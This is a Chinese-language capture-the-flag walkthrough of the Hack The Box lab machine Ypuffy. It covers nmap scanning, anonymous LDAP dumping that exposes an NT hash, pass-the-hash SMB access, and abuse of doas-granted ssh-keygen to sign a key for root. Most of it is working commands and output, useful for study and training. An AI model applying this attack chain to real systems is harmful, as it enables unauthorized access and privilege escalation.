====================================================================
我们用nmap对靶机进行信息收集
nmap -sV -sT -sC -T5 10.10.10.107
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-13 17:25 CST
Warning: 10.10.10.107 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.107
Host is up (0.29s latency).
Not shown: 940 closed ports, 55 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 2e:19:e6:af:1b:a7:b0:e8:07:2a:2b:11:5d:7b:c6:04 (RSA)
| 256 dd:0f:6a:2a:53:ee:19:50:d9:e5:e7:81:04:8d:91:b6 (ECDSA)
|_ 256 21:9e:db:bd:e1:78:4d:72:b0:ea:b4:97:fb:7f:af:91 (ED25519)
80/tcp open http OpenBSD httpd
| fingerprint-strings:
| DNSVersionBindReqTCP, RPCCheck:
| HTTP/1.0 400 Bad Request
| Date: Wed, 13 Feb 2019 09:26:59 GMT
| Server: OpenBSD httpd
| Connection: close
| Content-Type: text/html
| Content-Length: 431
|
|
|
|
| 400 Bad Request
|
|
|
| 400 Bad Request
|
| OpenBSD httpd
|
|
| GenericLines:
| HTTP/1.0 400 Bad Request
| Date: Wed, 13 Feb 2019 09:26:55 GMT
| Server: OpenBSD httpd
| Connection: close
| Content-Type: text/html
| Content-Length: 431
|
|
|
|
| 400 Bad Request
|
|
|
| 400 Bad Request
|
| OpenBSD httpd
|
|_
|_http-server-header: OpenBSD httpd
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: YPUFFY)
389/tcp open ldap (Anonymous bind OK)
445/tcp open netbios-ssn Samba smbd 4.7.6 (workgroup: YPUFFY)
通过报告我们知道
在端口22上运行ssh,在端口80上运行http,在端口139和445上运行smb,在端口389上运行ldap。
我们先看看80端口
好像出现了问题,那我们再看看SMB服务
看能不能进行匿名身份进行资源枚举
smbmap -H 10.10.10.107
提示认证失败
我们在换LDAP试试看,在namp的报告中提示,LDAP允许匿名访问
我们用ldapsearch工具老进行扫描
ldapsearch -h 10.10.10.107 -p 389 -x -b dc=hackthebox,dc=htb
-h:IP地址
-p:监听端口
-x:简单认证
-b:搜索的入口
# extended LDIF
#
# LDAPv3
# basewith scope subtree
# filter: (objectclass=*)
# requesting: ALL
## hackthebox.htb
dn: dc=hackthebox,dc=htb
dc: hackthebox
objectClass: top
objectClass: domain# passwd, hackthebox.htb
dn: ou=passwd,dc=hackthebox,dc=htb
ou: passwd
objectClass: top
objectClass: organizationalUnit# bob8791, passwd, hackthebox.htb
dn: uid=bob8791,ou=passwd,dc=hackthebox,dc=htb
uid: bob8791
cn: Bob
objectClass: account
objectClass: posixAccount
objectClass: top
userPassword:: e0JTREFVVEh9Ym9iODc5MQ==
uidNumber: 5001
gidNumber: 5001
gecos: Bob
homeDirectory: /home/bob8791
loginShell: /bin/ksh# alice1978, passwd, hackthebox.htb
dn: uid=alice1978,ou=passwd,dc=hackthebox,dc=htb
uid: alice1978
cn: Alice
objectClass: account
objectClass: posixAccount
objectClass: top
objectClass: sambaSamAccount
userPassword:: e0JTREFVVEh9YWxpY2UxOTc4
uidNumber: 5000
gidNumber: 5000
gecos: Alice
homeDirectory: /home/alice1978
loginShell: /bin/ksh
sambaSID: S-1-5-21-3933741069-3307154301-3557023464-1001
displayName: Alice
sambaAcctFlags: [U ]
sambaPasswordHistory: 00000000000000000000000000000000000000000000000000000000
sambaNTPassword: 0B186E661BBDBDCF6047784DE8B9FD8B
sambaPwdLastSet: 1532916644# group, hackthebox.htb
dn: ou=group,dc=hackthebox,dc=htb
ou: group
objectClass: top
objectClass: organizationalUnit# bob8791, group, hackthebox.htb
dn: cn=bob8791,ou=group,dc=hackthebox,dc=htb
objectClass: posixGroup
objectClass: top
cn: bob8791
userPassword:: e2NyeXB0fSo=
gidNumber: 5001# alice1978, group, hackthebox.htb
dn: cn=alice1978,ou=group,dc=hackthebox,dc=htb
objectClass: posixGroup
objectClass: top
cn: alice1978
userPassword:: e2NyeXB0fSo=
gidNumber: 5000# ypuffy, hackthebox.htb
dn: sambadomainname=ypuffy,dc=hackthebox,dc=htb
sambaDomainName: YPUFFY
sambaSID: S-1-5-21-3933741069-3307154301-3557023464
sambaAlgorithmicRidBase: 1000
objectclass: sambaDomain
sambaNextUserRid: 1000
sambaMinPwdLength: 5
sambaPwdHistoryLength: 0
sambaLogonToChgPwd: 0
sambaMaxPwdAge: -1
sambaMinPwdAge: 0
sambaLockoutDuration: 30
sambaLockoutObservationWindow: 30
sambaLockoutThreshold: 0
sambaForceLogoff: -1
sambaRefuseMachinePwdChange: 0
sambaNextRid: 1001# search result
search: 2
result: 0 Success# numResponses: 9
# numEntries: 8
我们也可以使用nmap来枚举ldap,并调用一个脚本 ldap-search
nmap -p 389 --script ldap-search 10.10.10.107
PORT STATE SERVICE
389/tcp open ldap
| ldap-search:
| Context: dc=hackthebox,dc=htb
| dn: dc=hackthebox,dc=htb
| dc: hackthebox
| objectClass: top
| objectClass: domain
| dn: ou=passwd,dc=hackthebox,dc=htb
| ou: passwd
| objectClass: top
| objectClass: organizationalUnit
| dn: uid=bob8791,ou=passwd,dc=hackthebox,dc=htb
| uid: bob8791
| cn: Bob
| objectClass: account
| objectClass: posixAccount
| objectClass: top
| userPassword: {BSDAUTH}bob8791
| uidNumber: 5001
| gidNumber: 5001
| gecos: Bob
| homeDirectory: /home/bob8791
| loginShell: /bin/ksh
| dn: uid=alice1978,ou=passwd,dc=hackthebox,dc=htb
| uid: alice1978
| cn: Alice
| objectClass: account
| objectClass: posixAccount
| objectClass: top
| objectClass: sambaSamAccount
| userPassword: {BSDAUTH}alice1978
| uidNumber: 5000
| gidNumber: 5000
| gecos: Alice
| homeDirectory: /home/alice1978
| loginShell: /bin/ksh
| sambaSID: S-1-5-21-3933741069-3307154301-3557023464-1001
| displayName: Alice
| sambaAcctFlags: [U ]
| sambaPasswordHistory: 00000000000000000000000000000000000000000000000000000000
| sambaNTPassword: 0B186E661BBDBDCF6047784DE8B9FD8B
| sambaPwdLastSet: 1532916644
| dn: ou=group,dc=hackthebox,dc=htb
| ou: group
| objectClass: top
| objectClass: organizationalUnit
| dn: cn=bob8791,ou=group,dc=hackthebox,dc=htb
| objectClass: posixGroup
| objectClass: top
| cn: bob8791
| userPassword: {crypt}*
| gidNumber: 5001
| dn: cn=alice1978,ou=group,dc=hackthebox,dc=htb
| objectClass: posixGroup
| objectClass: top
| cn: alice1978
| userPassword: {crypt}*
| gidNumber: 5000
| dn: sambadomainname=ypuffy,dc=hackthebox,dc=htb
| sambaDomainName: YPUFFY
| sambaSID: S-1-5-21-3933741069-3307154301-3557023464
| sambaAlgorithmicRidBase: 1000
| objectclass: sambaDomain
| sambaNextUserRid: 1000
| sambaMinPwdLength: 5
| sambaPwdHistoryLength: 0
| sambaLogonToChgPwd: 0
| sambaMaxPwdAge: -1
| sambaMinPwdAge: 0
| sambaLockoutDuration: 30
| sambaLockoutObservationWindow: 30
| sambaLockoutThreshold: 0
| sambaForceLogoff: -1
| sambaRefuseMachinePwdChange: 0
|_ sambaNextRid: 1001Nmap done: 1 IP address (1 host up) scanned in 6.60 seconds
我们得到一个用户名alice1978和一个smb NT哈希 0B186E661BBDBDCF6047784DE8B9FD8B
此哈希是不可破解的,但我们仍然可以使用它来进行身份验证。
然后我们用我们得到的账号和密码进行SMB枚举
这里我们用crackmapexec
crackmapexec 10.10.10.107 -u alice1978 -H 0B186E661BBDBDCF6047784DE8B9FD8B --shares
这里有2个共享一个是alice 可读可写 另一个IPC$不允许访问
我们也可以用smbclient来枚举
smbclient -U alice1978%0B186E661BBDBDCF6047784DE8B9FD8B --pw-nt-hash -L //10.10.10.107/
然后我们连接下alic
smbclient -U alice1978%0B186E661BBDBDCF6047784DE8B9FD8B --pw-nt-hash -L //10.10.10.107/alice
只有一个文件叫my_private_key.ppk
get my_private_key.ppk下载它
ppk是putty远程登陆使用的文件后缀,我们需要进行转换
my_private_key.ppk 是一个putty私钥,我们需要将其转换为ssh私钥,以便能够与它进行ssh。
在kali,我们按照putty-tools
apt-get install putty-tools
然后我们将使用puttygen:
puttygen my_private_key.ppk -O private-openssh -o alice.key
然后
chmod 600 alice.key
最好进行连接
ssh -i alice.key [email protected]
还记得http被重置吗,我们查看下/etc/httpd.conf
location "/userca*"
location "/sshauth*"
进行2次重定向
同时发现
另外的2个用户
在bob8971的家目录中存在一个sql文件
它创建一个名为的表principals和另一个名为的表keys
我们在检查下/etc/ssh/目录下的sshd_config文件
# $OpenBSD: sshd_config,v 1.102 2018/02/16 02:32:40 djm Exp $
# This is the sshd server system-wide configuration file. See
# sshd_config(5) for more information.
# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented. Uncommented options override the
# default value.
#Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::
#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key
# Ciphers and keying
#RekeyLimit default none
# Logging
#SyslogFacility AUTH
#LogLevel INFO
# Authentication:
#LoginGraceTime 2m
PermitRootLogin prohibit-password
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10
#PubkeyAuthentication yes
# The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2
# but this is overridden so installations will only check .ssh/authorized_keys
AuthorizedKeysFile .ssh/authorized_keys
#AuthorizedPrincipalsFile none
AuthorizedKeysCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type=keys&username=%u
AuthorizedKeysCommandUser nobody
TrustedUserCAKeys /home/userca/ca.pub
AuthorizedPrincipalsCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type=principals&username=%u
AuthorizedPrincipalsCommandUser nobody
# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes
# To disable tunneled clear text passwords, change to no here!
PasswordAuthentication no
#PermitEmptyPasswords no
# Change to no to disable s/key passwords
ChallengeResponseAuthentication no
AllowAgentForwarding no
AllowTcpForwarding no
#GatewayPorts no
X11Forwarding no
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
#PrintMotd yes
#PrintLastLog yes
#TCPKeepAlive yes
#UseLogin no
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /var/run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none
# no default banner path
#Banner none
# override default of no subsystems
Subsystem sftp /usr/libexec/sftp-server
# Example of overriding settings on a per-user basis
#Match User anoncvs
# X11Forwarding no
# AllowTcpForwarding no
# PermitTTY no
# ForceCommand cvs server
所以http服务负责一些ssh身份验证的东西,
我们用curl 请求下第一个
curl 'http://127.0.0.1/sshauth?type=keys&username=root'
没有任何返回
再试试第二个
curl 'http://127.0.0.1/sshauth?type=principals&username=root'
请求root的密钥给我们没有响应,但是请求我们得到的主体3m3rgencyB4ckd00r
所以现在我们有了root的主体3m3rgencyB4ckd00r
。从理论上讲,我们可以生成ssh密钥并使用root的主体对它们进行签名,我们将能够以root身份与它们进行ssh。
问题是,因为alice1978
我们没有被授权这样做。
在Linux上,我们可以检查是否可以运行提升的命令,sudo -l
但是这里没有
我们检查下doas
doas是BSD系列系统下的权限管理工具,类似于Debian系列下的sudo命令
这里我们看到alice1978可以 不需要密码作为用户userca执行/usr/bin/ssh-keygen
第一步是为其创建ssh密钥
ssh-keygen -t rsa -f /tmp/id_rsa
然后我们需要证书(ca),我们到 /home/userca/
并签署我们刚刚创建的ssh密钥
-s
证书
-I
身份
-n主体
最后我们将以root身份ssh:
ssh -i /tmp/id_rsa root@localhost